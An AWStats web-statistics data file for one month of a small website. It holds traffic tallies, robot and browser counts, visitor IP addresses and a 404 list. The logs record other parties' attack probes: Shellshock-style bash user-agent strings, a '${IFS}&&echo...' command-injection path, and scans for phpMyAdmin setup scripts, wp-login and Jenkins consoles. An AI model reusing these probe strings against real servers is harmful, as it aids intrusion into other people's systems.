AWSTATS DATA FILE 6.8 (build 1.910)
# If you remove this file, all statistics for date 201701 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 1915                
POS_TIME 2597                
POS_VISITOR 16168               
POS_DAY 30100               
POS_DOMAIN 3543                
POS_LOGIN 4392                
POS_ROBOT 4547                
POS_WORMS 5398                
POS_EMAILSENDER 5529                
POS_EMAILRECEIVER 5672                
POS_SESSION 30999               
POS_SIDER 31202               
POS_FILETYPES 5807                
POS_OS 6134                
POS_BROWSER 6274                
POS_SCREENSIZE 6912                
POS_UNKNOWNREFERER 6986                
POS_UNKNOWNREFERERBROWSER 8190                
POS_ORIGIN 8784                
POS_SEREFERRALS 8925                
POS_PAGEREFS 9093                
POS_SEARCHWORDS 9385                
POS_KEYWORDS 9768                
POS_MISC 2261                
POS_ERRORS 10107               
POS_CLUSTER 4248                
POS_SIDER_404 10248               
POS_PLUGIN_geoip_city_maxmind 13956               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20170201000203 811 184014 4963520115873
FirstTime 20170101003737
LastTime 20170131220625
LastUpdate 20170201061051 811 0 810 0 0
TotalVisits 376                 
TotalUnique 312                 
MonthHostsKnown 0                   
MonthHostsUnknown 361                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 1 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 49 456 42120729 582 633 10756824
1 83 707 68595714 332 398 9332599
2 58 466 48782692 267 331 8378598
3 40 239 20358550 309 335 6257333
4 82 737 76796160 300 352 6134540
5 59 463 43591981 290 323 5093790
6 90 567 52162300 349 434 10811671
7 62 358 34598590 244 271 4422667
8 75 630 59767954 271 326 6178175
9 49 295 24860375 236 262 4498467
10 51 437 44141879 316 384 9983550
11 25 233 23544241 276 314 7022830
12 30 347 35337832 249 305 8214104
13 58 455 44647654 261 320 7170780
14 28 121 11355998 298 336 6859627
15 12 54 2008874 280 332 6224727
16 16 19 849285 670 701 11584366
17 25 81 5979272 976 1020 13949816
18 28 82 4470888 332 374 8673407
19 5 9 367982 253 302 5544956
20 23 81 6751217 286 310 4568044
21 26 194 14985098 338 384 7204562
22 17 113 10997931 577 623 8895751
23 29 198 17672126 605 632 8262665
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 42
in 389 4272 437133027
us 265 1426 124560213
unknown 104 515 34971566
id 47 486 42750078
gb 39 39 309677
tr 18 18 75945
ru 18 90 4289206
eu 15 15 971617
th 15 141 15552682
il 14 130 14944258
ua 5 5 155495
pt 1 1 72187
rs 4 4 288751
ph 2 2 144376
cn 14 17 2270820
es 3 3 216564
my 1 2 175956
no 6 57 5552551
mx 0 1 57438
fr 4 4 288749
kz 1 1 114896
ro 2 2 144376
ma 1 1 72187
tn 1 1 72188
dk 1 1 72188
co 2 2 144376
br 3 5 643443
mk 2 2 144376
fi 5 56 5480364
de 1 1 72187
hr 2 2 144375
md 1 1 72188
jp 4 4 288751
ch 4 4 288750
ee 0 1 50770
pk 2 2 144376
it 1 1 72188
pl 1 1 72188
za 1 1 72187
ca 9 13 1032396
nl 11 11 693229
ar 1 1 72187
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 19
googlebot 3213 64565015 20170131233437 0
no_user_agent 2457 1926636 20170131233209 0
baiduspider 1597 54824182 20170131235457 0
crawl 1008 11407846 20170123010846 0
bot[+:,\.\;\/\\-] 266 19030981 20170131222858 0
seznambot 201 2847770 20170131214136 0
archive\.org_bot 125 14993502 20170106015804 0
sogou 85 7243522 20170131170832 0
yandex 36 2639813 20170130192531 0
phantom 35 1512676 20170117021323 0
spider 1 72187 20170110183803 0
slurp 6 367087 20170114130241 0
[+:,\.\;\/\\-]bot 1 72187 20170127200338 0
robot 9 258832 20170110183806 0
python 9 549982 20170117021322 0
surveybot 1 72187 20170114182323 0
mj12bot 4 252070 20170129230412 0
msnbot\-media 1 35684 20170115213558 0
netcraft 3 72187 20170111022340 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 14
eot 10 277782 0 0
css 841 23967628 0 0
png 3268 517634224 0 0
ttf 80 12355576 0 0
woff 9 341428 0 0
woff2 223 4039716 0 0
php 316 13493370 0 0
html 341 23597921 0 0
xml 1 1007 0 0
js 1366 47250839 0 0
jpg 830 46066151 0 0
jpeg 16 10816 0 0
Unknown 5 1955 0 0
svg 36 5706909 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 9
winlong 7
winxp 224
win2000 2
winnt 3774
linuxubuntu 61
linux 2414
macosx 681
win2003 11
Unknown 168
END_OS

# Browser ID - Hits
BEGIN_BROWSER 43
firefox28.0 65
msie6.0 33
firefox15.0 1
firefox44.0 58
firefox26.0 20
firefox52.0 72
firefox18.0 1
msie11 3
firefox24.0 3
firefox31.0 15
msie8.0 69
firefox6.0.2 2
msie7.0 69
firefox40.1 67
wget 3
msie9.0 53
firefox3.6.10 1
firefox27.0 4
Unknown 40
firefox11.0 3
firefox3.0.8 6
firefox50.0 169
firefox48.0 1
firefox17.0 1
opera 59
firefox21.0 2
firefox29.0 52
firefox3.5.2 1
firefox12.0.1 1
firefox30.0 4
firefox47.0 10
firefox1.0.7 2
firefox33.0 1
firefox25.0 6
mozilla 180
netscape5.0 2
firefox14.0.1 7
msie10.0 106
firefox3.6.28 1
firefox51.0 1
firefox36.0 5
firefox27.3 3
safari 6140
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 19
TelegramBot_(like_TwitterBot) 20170118080547
kscan1.4.3 20170130085034
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20170121045216
()_{_:;};_/bin/bash_-c_\ 20170106195245
Scanbot 20170131103000
Opera/9.27 20170127072202
Mozilla/5.0_(BlackBerry;_U;_BlackBerry_9930;_en-US)_AppleWebKit/534.11__(KHTML,_like_Gecko)_Version/7.1.0.1066_Mobile_Safari/534.11_ 20170131010825
Mozilla/5.0_(compatible;_Dataprovider.com;) 20170131100530
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20170120153341
www.probethenet.com_scanner 20170121005200
()_{_:;};echo;_/bin/bash_-c_\ 20170104071057
Mozilla/5.0 20170123145514
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20170127111951
Mozilla/5.0_AppleWebKit/537.36_(KHTML,_like_Gecko)_Chrome/55.0.2883.95_Safari/537.36 20170127013142
Mozilla/6.0_(compatible) 20170127012743
Mozilla/5.0_(compatible;_Nmap_Scripting_Engine;_http://nmap.org/book/nse.html) 20170110082327
Android 20170121161448
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20170102084849
Mozilla/4.0_(compatible;) 20170131091455
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 10
TelegramBot_(like_TwitterBot) 20170118080547
kscan1.4.3 20170130085034
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20170121045216
www.probethenet.com_scanner 20170121005200
()_{_:;};echo;_/bin/bash_-c_\ 20170104071057
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20170127111951
()_{_:;};_/bin/bash_-c_\ 20170106195245
Android 20170121161448
BlackBerry9000/4.6.0.167_Profile/MIDP-2.0_Configuration/CLDC-1.1_VendorID/102_ips-agent 20170102084849
Scanbot 20170131103000
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 397 653
From1 5 5
From2 60 73
From3 4 5
From4 554 6606
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 2
google 58 71
yandex 2 2
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 5
http://googleweblight.com 1 1
http://hvd-store.com 1 1
https://www.facebook.com 1 1
http://hundejo.com 1 1
http://cn.bing.com/images/search 0 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 5
trainee+sales+assiston+coodinator+cv+sample+in+sri+lanka 1
application+letter+for+after+school+job+as+a+sales+representative 1
multiple+personality+disorder+phd+thesis 1
oozaaoo+logo+image 1
quantity+survey+writen+by+writer+name 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 32
sales 2
thesis 1
a 1
phd 1
for 1
personality 1
name 1
in 1
assiston 1
sample 1
letter 1
by 1
cv 1
lanka 1
coodinator 1
disorder 1
after 1
oozaaoo 1
trainee 1
writer 1
survey 1
school 1
representative 1
sri 1
application 1
quantity 1
job 1
image 1
writen 1
logo 1
as 1
multiple 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 5
401 31 15407
302 10 940
206 41 2842603
400 11 3073
404 851 417480
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 136
/admin/content/sitetree/ 1 -
/phpMyAdmin-4.2.1-english 1 -
/recordings/LICENSE.txt 1 -
/script 1 -
/phpMyAdmin-4.2.1-all-languages 1 -
/contente.php%3Fbest-article-writing-sites 1 http://www.nber.org/papers/w14530
/web/wp-login.php 1 -
/cgi/common.cgi 3 -
/stssys.htm 3 -
/css/images/maodal-bg.pngf 1 -
/wordpress/index.php 1 -
/js/s3slider.js 1 -
//MyAdmin/scripts/setup.php 1 -
/v2/login 1 -
/blogs/wp-login.php 2 -
//phpMyAdmin3/scripts/setup.php 1 -
/language/Swedish${IFS}&&echo${IFS}610cker>qt&&tar${IFS}/string.js 3 -
/xmlrpc.php 1 -
/CFIDE/administrator/ 1 -
/v2/login/ 1 -
/msd1.24stable 1 -
/axis-cgi/jpg/image.cgi 2 1
/phpadmin/scripts/setup.php 1 -
/cms/wp-login.php 3 -
/static/.gitignore 1 -
/mysql 2 -
http://clientapi.ipip.net/echo.php 2 -
/contente.php%3Fhelp-writing-a-comparative-essay 1 http://digitalcommons.utep.edu/dissertations/AAI3304644/
/v2/register 5 -
/aboutus/ 2 -
/phpMyAdmin/scripts/setup.php 2 -
/js/click.validate 1 -
/login 1 -
/wp-login.php 73 -
/images/cloudoozaaoo.gif 2 http://oozaaoo.com/css/style.css
//pma/scripts/setup.php 1 -
/js/scroll.affix.data-api 1 -
/v2/privacy/ 1 -
/SQlite/main.php 1 -
/mysql/scripts/setup.php 1 -
/SQLiteManager/main.php 1 -
/contactus/ 1 -
/wp-admin/admin-ajax.php 1 -
/SQLite/SQLiteManager-1.2.4/main.php 1 -
//myadmin/scripts/setup.php 1 -
/tmUnblock.cgi 1 -
/mySqlDumper 1 -
/sqlitemanager/main.php 1 -
/admin/scripts/setup.php 1 -
/recordings/ 1 -
/phpMyAdmin 1 -
/privacy/ 1 -
/support/ 1 -
/simpla/ 1 -
/readme.html 1 -
/forum.php 1 -
/r/z.php 1 -
/web/scripts/setup.php 1 -
/phpmyadmin 1 -
/jenkins/script 1 -
/msd1.24.4 1 -
/SQL/scripts/setup.php 1 -
/admin/phpmyadmin/scripts/setup.php 1 -
/robots.txt 511 -
/jmx-console 1 -
//scripts/setup.php 1 -
/manager/ 1 -
/admin/pma/scripts/setup.php 1 -
/viagra/ 1 https://www.google.com
/wordpress/wp-login.php 2 -
/MySQLDumper 1 -
/home.html 2 -
/images/domestic/trivandrum.png 20 http://www.oozaaoo.com/domestic.php
/new/wp-login.php 1 -
/en/wp-login.php 4 -
/scripts/setup.php 1 -
/js/validate.min.map 1 -
/sql 2 -
/contente.php%3Fcheap-paper-eskimo-products 1 http://climatecommunication.yale.edu/about/people-partners/
//cgi-sys/realsignup.cgi 1 -
/mobile/ 2 -
/mybooking/ 2 -
/public.js 1 -
//admin/imgs/version.js 1 -
/menuBcm.js 1 -
/v2/terms_and_condition/ 2 -
/myadmin/scripts/setup.php 1 -
/contact-us.html 2 -
/wp-config-sample.php 1 -
/administrator 1 -
/blog/wp-login.php 3 -
/a 2 -
/register/ 1 -
/site/wp-login.php 4 -
/msd 1 -
/admin/ 1 -
/img/fav.png 51 http://www.oozaaoo.com/
/images/client-testimonial.png 2 http://oozaaoo.com/css/style.css
/mysqladmin/scripts/setup.php 2 -
/xampp/phpmyadmin/scripts/setup.php 1 -
/w00tw00t.at.blackhats.romanian.anti-sec:) 2 -
/dbadmin/scripts/setup.php 1 -
/hndUnblock.cgi 1 -
/test/wp-login.php 5 -
/MyAdmin/scripts/setup.php 2 -
/user/password/reset/ 1 -
/phpmyadmin/scripts/setup.php 9 -
/SQLiteManager-1.2.4/main.php 1 -
/redirect.php 1 -
/typo3/phpmyadmin/scripts/setup.php 1 -
/myadmin 1 -
/about.html 2 -
/muieblackcat 1 -
/wp/index.php 1 -
/PHPMYADMIN/scripts/setup.php 1 -
/images/background.png 2 http://oozaaoo.com/css/style2.css
/wp/wp-login.php 3 -
/web/phpMyAdmin/scripts/setup.php 1 -
http://180.163.113.82/check_proxy 1 -
/mysqldumper 1 -
/images/image-slider/about_us1.png 2 http://oozaaoo.com/css/style2.css
/command.php 3 -
/js/1.11.4 1 -
//recordings/LICENSE.txt 1 -
/v2 1 -
/admin 1 -
/script/live.js 2 -
/pma/scripts/setup.php 2 -
/googlebe73d339611e97a4.html 1 -
/manager/html 4 -
/db/scripts/setup.php 1 -
/avwlonfa.html 1 -
/sqlite/main.php 1 -
/news/wp-login.php 2 -
/engine/log.txt 1 -
/phpmyadmin/index.php 1 -
END_SIDER_404

# Plugin key - Pages - Hits - Bandwidth - Last access
BEGIN_PLUGIN_geoip_city_maxmind 80
unknown 0 3486 0 0
in_madras_25 0 568 0 0
us_barstow_ca 0 487 0 0
id_jakarta_04 0 483 0 0
in_new%20delhi_07 0 450 0 0
us_mountain%20view_ca 0 431 0 0
in_delhi_07 0 257 0 0
in_hyderabad_02 0 186 0 0
in_kochi_13 0 153 0 0
in_thana_16 0 95 0 0
in_tezpur_03 0 1 0 0
ua_kiev_13 0 1 0 0
us_sterling_va 0 7 0 0
jp_tokyo_40 0 1 0 0
us_fullerton_ca 0 1 0 0
us_san%20diego_ca 0 2 0 0
us_auburn%20hills_mi 0 26 0 0
ca_mississauga_on 0 2 0 0
us_palo%20alto_ca 0 15 0 0
hr_varazdin_16 0 1 0 0
us_san%20bruno_ca 0 2 0 0
us_atlanta_ga 0 2 0 0
us_simi%20valley_ca 0 57 0 0
th_bangkok_40 0 74 0 0
ro_hunedoara_21 0 1 0 0
tr_istanbul_34 0 1 0 0
in_chandigarh_05 0 1 0 0
us_washington_dc 0 12 0 0
rs_belgrade_00 0 1 0 0
us_downers%20grove_il 0 70 0 0
ph_caloocan_f2 0 1 0 0
es_barcelona_56 0 1 0 0
my_kuala%20lumpur_14 0 2 0 0
tn_radis_36 0 1 0 0
us_yuma_az 0 1 0 0
br_bauru_27 0 1 0 0
us_nashua_nh 0 1 0 0
dk_kolding_21 0 1 0 0
br_campinas_27 0 1 0 0
us_providence_ut 0 1 0 0
ca_ottawa_on 0 9 0 0
us_chicago_il 0 1 0 0
in_bangalore_19 0 2 0 0
pl_roczyny_83 0 1 0 0
ca_springhill_ns 0 1 0 0
hr_rijeka_12 0 1 0 0
us_woodbridge_nj 0 7 0 0
us_cary_nc 0 1 0 0
md_chisinau_48 0 1 0 0
nl_rotterdam_11 0 5 0 0
co_bogotá_33 0 1 0 0
cn_beijing_22 0 1 0 0
cn_shenzhen_30 0 9 0 0
ca_moncton_nb 0 1 0 0
ar_buenos%20aires_07 0 1 0 0
in_mangaluru_19 0 1 0 0
us_freeport_ny 0 1 0 0
es_alea_34 0 1 0 0
ua_chernihiv_02 0 1 0 0
it_milan_09 0 1 0 0
jp_kanda_07 0 1 0 0
in_neyveli_25 0 70 0 0
br_brasília_07 0 1 0 0
mk_skopje_41 0 1 0 0
us_dallas_tx 0 31 0 0
fr_paris_a8 0 1 0 0
in_mumbai_16 0 64 0 0
ua_kharkov_07 0 1 0 0
us_virginia%20beach_va 0 1 0 0
no_sandnessjøen_09 0 1 0 0
ru_samara_65 0 1 0 0
mx_mazatlán_25 0 1 0 0
us_seattle_wa 0 34 0 0
cn_ling_25 0 1 0 0
in_pondicherry_22 0 69 0 0
us_wilmington_de 0 71 0 0
nl_amsterdam_07 0 3 0 0
ro_oradea_05 0 1 0 0
ru_moscow_48 0 1 0 0
fi_tampere_15 0 56 0 0
END_PLUGIN_geoip_city_maxmind

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 361
207.210.200.149 30 30 8896 20170124065821
31.28.67.40 30 30 9423 20170127072206
59.145.103.170 19 186 21994219 20170104054105
94.73.145.149 17 17 3757 20170125171202
112.133.236.95 16 156 18919648 20170118045814
64.233.172.145 14 131 12514250 20170113135515
122.165.97.30 13 188 20095164 20170116012901
64.233.173.144 12 105 11103277 20170128141132
82.80.230.228 12 119 13276501 20170127012843
64.233.172.141 11 129 12056981 20170113135513
54.153.124.123 1 1 72187 20170104115459
212.129.62.79 2 2 144374 20170116012352
8.37.235.66 1 1 221 20170126035153
122.174.11.163 7 79 9512251 20170118080454
66.249.84.193 0 1 8802 
72.203.77.164 0 1 57438 
139.162.113.212 2 2 144376 20170126203705
69.63.188.198 0 1 57438 
64.233.172.140 3 32 3191209 20170131035942
196.207.111.95 6 70 6078093 20170108235333
41.227.49.237 1 1 72188 20170130182542
23.247.88.19 1 1 72188 20170119072909
139.162.13.205 2 2 43540 20170123145514
5.13.14.123 1 1 72188 20170126055851
174.127.133.98 4 13 401597 20170105132603
103.69.9.62 8 58 5268069 20170123061339
164.100.105.146 1 7 286430 20170116051532
23.247.8.50 1 1 72187 20170103060512
174.127.133.99 0 2 98073 
117.192.192.47 0 1 109481 
14.192.26.140 1 1 72188 20170129073006
91.210.144.200 1 1 72188 20170121173536
64.233.173.143 8 110 11133743 20170128141254
157.50.153.91 5 22 1526398 20170128081618
208.100.26.232 1 1 0 20170110082327
173.252.124.219 0 1 57438 
23.247.27.34 2 2 144375 20170121015201
65.190.85.213 0 1 57438 
38.94.177.156 1 1 114896 20170127093054
5.9.94.207 6 6 391291 20170122183156
169.56.71.41 1 1 72187 20170112015703
223.229.205.191 9 72 5829744 20170131063616
171.60.234.174 7 79 9500440 20170101114322
104.236.82.54 1 13 508461 20170117120458
45.55.133.245 1 13 508462 20170125123338
54.202.245.106 1 1 72188 20170131000902
93.95.103.45 1 1 72187 20170109042529
121.242.235.146 6 116 12386187 20170104072114
157.50.6.52 0 12 515324 
66.220.152.163 0 1 57438 
45.55.171.73 7 19 899751 20170121091141
159.203.169.43 1 13 508462 20170131055106
117.207.114.163 7 70 6091555 20170108224901
23.247.27.106 1 1 72187 20170104052657
183.83.51.199 9 129 13106633 20170113003508
85.76.52.77 5 56 5480364 20170124174139
122.173.136.144 1 1 72187 20170116013349
69.63.188.215 0 1 57438 
83.10.252.78 1 1 72188 20170130081953
157.50.233.170 5 58 6947530 20170131220417
45.55.133.252 1 13 508462 20170119152656
111.125.209.125 1 1 72187 20170116113933
95.65.30.156 1 1 72188 20170130164002
38.100.21.62 5 11 467308 20170111091356
138.197.6.83 6 6 391285 20170116055537
171.61.244.165 6 70 6078093 20170117011805
207.46.13.139 0 1 6841 
36.5.187.92 1 1 8829 20170109034831
82.80.249.202 1 1 72188 20170127012855
71.6.146.185 1 1 72187 20170108080952
89.164.11.138 1 1 72188 20170129100233
104.236.236.26 6 6 391285 20170104233349
54.162.116.27 1 1 72187 20170103133057
122.165.111.97 7 130 15347734 20170124050304
185.100.87.191 1 1 0 20170110081546
45.55.38.228 6 6 391285 20170107185141
182.76.5.14 9 73 6186491 20170128042555
87.55.132.200 1 1 72188 20170124135935
186.117.166.59 1 1 72188 20170129162046
109.120.161.138 2 2 72187 20170115234931
99.235.182.199 0 2 206564 
173.252.90.245 0 1 57438 
210.195.110.24 1 1 72188 20170124022014
54.171.252.178 1 1 72187 20170116214138
66.102.7.229 3 29 2857856 20170108090343
104.128.144.131 1 1 68967 20170121005200
201.13.159.61 0 1 148293 
176.31.39.23 3 3 108393 20170110072644
69.58.178.59 7 7 463472 20170102084855
104.148.75.35 1 1 72187 20170116051147
157.50.108.112 7 86 5856628 20170131220625
207.46.13.80 0 2 7109 
212.86.113.16 1 1 72187 20170111051932
142.4.218.236 8 9 536667 20170131100532
174.127.133.100 3 12 629050 20170105133027
45.55.190.208 1 13 508461 20170107055417
82.145.220.169 5 56 5480363 20170118125920
49.35.47.121 1 1 72187 20170116104103
207.46.13.183 0 6 399491 
85.149.56.245 1 1 72188 20170124094818
200.66.56.158 0 1 57438 
45.241.240.174 1 1 72188 20170125154231
23.247.72.90 2 2 144375 20170120045650
200.122.71.43 1 1 72187 20170117145704
46.235.158.196 5 5 291575 20170109003014
95.211.205.151 1 1 72187 20170115132423
46.217.16.59 1 1 72188 20170130182902
180.191.111.213 1 1 72188 20170126203947
122.161.46.57 7 71 6150283 20170119081258
36.85.210.101 0 1 57438 
174.127.133.103 1 1 3319 20170105141004
106.208.84.212 0 1 57438 
182.64.194.179 7 71 6114224 20170116064220
23.247.72.83 1 1 72187 20170103232001
106.201.189.236 7 117 12501085 20170125081312
106.76.192.51 3 19 1291467 20170131040019
23.247.88.123 1 1 72187 20170101030314
23.247.88.11 1 1 72188 20170121051652
103.52.254.253 1 1 72188 20170127043324
77.28.212.147 1 1 72188 20170128111309
49.206.127.210 7 144 16038003 20170110115217
103.204.179.152 1 1 72187 20170117173709
62.212.73.49 1 1 72187 20170106002133
213.254.241.7 1 1 72188 20170126004957
1.47.200.48 8 73 6269990 20170131035700
106.120.173.121 0 2 9888 
178.220.230.220 1 1 72188 20170129051620
122.178.59.201 10 131 15300164 20170104070936
104.156.231.254 1 1 72188 20170130194424
188.32.229.218 1 39 2211060 20170105184113
74.81.75.67 2 2 72578 20170104071057
138.197.111.21 1 13 508462 20170129225836
149.154.167.164 1 1 72187 20170118080547
138.197.104.19 6 6 391902 20170126133734
104.148.34.43 2 2 144376 20170123080922
142.177.232.153 1 1 10577 20170124201709
110.169.223.234 0 2 421774 
168.1.128.36 1 1 72188 20170127210857
157.50.191.132 5 56 5480363 20170106002104
60.191.38.78 1 1 72188 20170123104407
117.251.118.44 1 1 72188 20170122085433
31.193.128.228 4 4 1564 20170126045521
66.102.7.231 1 30 3620707 20170106044211
124.124.203.101 6 70 6078093 20170118045822
126.3.194.166 1 1 72188 20170120064438
103.199.241.15 0 81 0 
157.50.7.207 4 46 4476031 20170109101857
105.108.72.222 1 1 72188 20170124115547
27.4.163.4 0 1 278588 
42.111.200.74 7 135 16228914 20170105122740
182.65.200.22 5 56 5480363 20170114230513
43.251.169.149 1 1 72188 20170126005331
117.193.237.129 5 56 5480364 20170126084522
125.99.51.154 11 95 11455706 20170105041638
51.15.59.54 2 2 144376 20170127013142
178.223.227.39 1 1 72187 20170118101107
176.115.147.157 1 1 72188 20170121165153
104.148.14.221 2 2 144376 20170121161448
156.205.50.216 1 1 72187 20170117204539
23.228.111.91 1 1 72187 20170118130134
182.118.55.238 1 1 72188 20170131113005
196.52.43.53 1 1 72187 20170118210802
178.148.176.237 1 1 72188 20170120145800
182.65.99.76 6 70 6078093 20170109003855
59.88.249.129 5 55 5267878 20170116232852
69.63.188.200 0 1 57438 
157.50.51.242 1 9 180116 20170123050034
52.90.26.90 1 1 72187 20170106041716
220.181.159.73 1 1 21794 20170103195357
121.242.63.60 5 57 5480584 20170109003014
104.148.75.107 1 1 72187 20170101003737
5.178.140.142 1 1 72187 20170117023054
123.201.68.245 1 1 72187 20170117184512
64.233.173.142 5 100 10784452 20170128112731
183.88.57.221 6 65 8788730 20170131104319
168.235.201.172 1 1 12697 20170124090907
27.130.49.39 1 1 72188 20170120053417
2.155.183.252 1 1 72188 20170122044326
138.197.111.240 6 6 391289 20170130183919
192.40.44.100 0 1 92841 
54.213.126.151 1 1 72187 20170113144228
138.197.6.74 1 13 508462 20170127033217
64.233.172.144 5 36 4121071 20170131035942
37.59.253.230 2 2 144375 20170120090144
94.23.75.242 1 1 72187 20170105063613
112.133.236.169 6 70 6078095 20170125061809
112.196.156.167 5 56 5480364 20170125010934
23.247.27.74 1 1 72187 20170104014208
106.208.168.215 5 58 5488652 20170115014925
66.249.84.29 0 1 8802 
198.20.69.74 1 1 72188 20170123233016
85.106.106.151 1 1 72188 20170130132047
118.193.27.13 1 1 72187 20170130085034
157.50.239.38 4 40 3853627 20170131100154
216.69.191.98 1 1 72187 20170112000926
107.179.84.107 1 1 72187 20170115141355
105.158.238.16 1 1 72188 20170121135017
46.0.193.125 1 1 72187 20170109203059
104.131.110.123 0 1 103282 
45.55.133.243 1 13 508461 20170104091340
23.247.88.3 1 1 72188 20170119021702
66.102.7.251 0 7 329782 
182.65.91.222 9 76 7874333 20170118061329
189.35.227.65 1 1 72187 20170102044122
46.166.148.152 1 1 72187 20170117220851
173.252.90.233 0 1 57438 
174.127.133.102 1 4 127977 20170105131918
171.61.244.43 10 77 7910464 20170107071618
23.247.27.51 1 1 72188 20170120132947
104.236.211.213 1 13 508461 20170112182040
103.2.135.178 1 1 72187 20170115033239
138.197.2.66 6 6 391285 20170113095553
104.236.225.99 6 6 391285 20170118201859
59.93.16.245 8 83 11206829 20170119021153
82.80.249.211 1 1 72188 20170127012320
23.247.27.2 1 1 72188 20170121030344
130.105.228.68 1 1 72188 20170131023622
103.235.198.186 1 1 72188 20170128100546
187.104.200.47 1 1 72188 20170127163919
117.248.111.215 6 70 6078093 20170103024350
179.126.142.227 1 1 72187 20170106195245
82.80.249.164 0 6 818395 
171.49.170.34 10 135 12996476 20170121100754
157.50.179.55 6 64 6020489 20170123050113
106.78.225.74 9 72 5865800 20170124022745
41.251.89.4 1 1 72187 20170117202232
168.235.201.102 1 1 221 20170125082026
98.145.21.12 1 1 9013 20170122145243
66.220.152.130 0 1 57438 
105.98.203.7 1 1 72188 20170124180919
104.148.75.91 1 1 72188 20170119024914
66.220.152.169 0 1 57438 
94.102.48.194 1 1 72187 20170110123918
183.129.160.229 1 1 72188 20170120125949
174.115.50.140 0 1 278588 
45.55.181.223 1 13 508462 20170121143604
177.141.118.75 1 1 72187 20170109041623
190.255.14.141 1 1 72188 20170130011905
93.136.26.50 1 1 72187 20170118111131
101.222.240.142 6 31 2869893 20170129081826
36.73.117.1 1 1 72188 20170127013908
174.127.188.37 1 1 72187 20170105121753
211.123.206.77 1 1 72188 20170122131656
217.12.204.250 1 1 10 20170113154937
174.127.133.21 1 1 72187 20170105132554
52.204.248.150 1 1 72188 20170120042258
27.62.75.113 7 87 9585986 20170124105439
82.165.74.222 1 1 72187 20170103093740
42.111.195.211 5 56 5480363 20170101213128
188.0.167.192 1 1 72188 20170128021944
109.63.158.118 7 41 1428463 20170103093721
138.197.73.64 6 6 391290 20170128164019
169.54.244.93 1 1 72187 20170104195829
185.42.46.39 1 1 72188 20170124081805
104.148.75.115 1 1 72188 20170121130604
23.247.72.59 1 1 72188 20170121153733
85.117.97.136 0 1 50770 
117.198.112.232 1 1 72188 20170126104243
23.20.98.8 0 1 8802 
42.111.137.211 8 72 6186411 20170117054440
117.193.20.9 10 58 6131601 20170124010830
169.54.244.82 1 1 72188 20170126164150
23.247.72.10 1 1 72188 20170123082314
165.117.232.82 2 2 17748 20170128202207
182.65.73.123 8 59 5642768 20170120022329
181.49.93.42 1 1 72188 20170124142019
177.41.16.97 0 1 278588 
95.61.41.9 1 1 72188 20170125001335
173.252.90.247 0 1 57438 
46.193.147.43 1 1 72188 20170128141124
139.162.114.154 1 1 72188 20170122073832
64.233.172.142 3 29 3018909 20170131035942
92.47.120.36 1 1 114896 20170131040414
66.220.152.136 0 2 114876 
42.111.133.194 1 10 338320 20170125034518
36.82.76.82 1 1 72188 20170131034634
66.249.91.16 1 1 53 20170120153341
